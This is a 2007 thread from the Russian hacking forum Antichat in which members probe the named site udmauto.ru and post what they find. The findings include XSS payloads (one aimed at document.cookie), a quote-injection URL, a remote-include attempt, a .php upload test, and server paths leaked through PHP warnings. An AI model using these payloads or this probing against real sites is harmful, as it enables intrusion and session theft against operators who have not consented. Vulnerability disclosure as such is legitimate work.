ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

udmauto.ru
  #1  
Старый 20.07.2007, 08:42
Аватар для neval
neval
Moderator - Level 7
Регистрация: 13.12.2006
Сообщений: 531
Провел на форуме:
2127116

Репутация: 383


По умолчанию udmauto.ru

Всем спасибо.
Закрыто.

Последний раз редактировалось neval; 03.09.2007 в 16:23..
 

  #2  
Старый 20.07.2007, 12:16
Аватар для Elvis000
Elvis000
Moderator - Level 7
Регистрация: 23.04.2007
Сообщений: 646
Провел на форуме:
4901399

Репутация: 1035


По умолчанию

"/><script>alert(/xss/)</script> в поле поиск, в поле e-mail

http://udmauto.ru/img.php?rand=995248785&file=1'

Последний раз редактировалось Elvis000; 25.07.2007 в 06:10..
 

  #3  
Старый 20.07.2007, 20:05
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

вышеописаные ксс

расскрытие путей
Код:
/home/automark/public_html/udmauto-ru/img.php
это просто так
http://udmauto.ru/img.php?rand=243436185&file=http://img138.imageshack.us/img138/7638/new14zh2.jpg

типо инклюд только бесполезный

смотрю дальше
 

  #4  
Старый 24.07.2007, 17:10
Аватар для Dark.iNiTro
Dark.iNiTro
Новичок
Регистрация: 20.07.2007
Сообщений: 2
Провел на форуме:
9491

Репутация: 1
По умолчанию

совет - фильтровать данные не только с помошью mod_rewrite но и в скрипте (если вся безопасноть основываеться только на этом моде)
 

  #5  
Старый 04.08.2007, 16:26
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

баг в восстановлении пароля..

вводим любое слово в мейл и нажимаем напомнить
Цитата:
ошибка: пользователь < antichat > не найден

Warning: Cannot modify header information - headers already sent by (output started at /home/automark/public_html/udmauto-ru/_lib/lib_author.inc.php:266) in /home/automark/public_html/udmauto-ru/_lib/lib_author.inc.php on line 393

баг в подписке http://udmauto.ru/personal-subscr.html
Цитата:
Warning: Variable passed to each() is not an array or object in /home/automark/public_html/udmauto-ru/_lib/tools.inc.php(1684) : eval()'d code on line 16

раскрытие путей в файле personal-face.html в профиле
Цитата:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/automark/public_html/udmauto-ru/_lib/tools.inc.php on line 3637
Not Supported File
Warning: copy(/home/automark/public_html/udmauto-ru/thumbnails/300-home/qwwwww@inbox.ru/2.php) [function.copy]: failed to open stream: No such file or directory in /home/automark/public_html/udmauto-ru/_usr/personalchange.inc.php on line 55

Пассивная ксс
Цитата:
http://udmauto.ru/use-remember&login=qwww%22%3E%3Cscript%3Ealert(documen t.cookie)%3C/script%3E.html
 

  #6  
Старый 05.08.2007, 03:04
Аватар для ShAnKaR
ShAnKaR
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


Отправить сообщение для ShAnKaR с помощью ICQ
По умолчанию

картиночку проверочную от ботов в коментарии бы а то заспамят зуб даю.
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ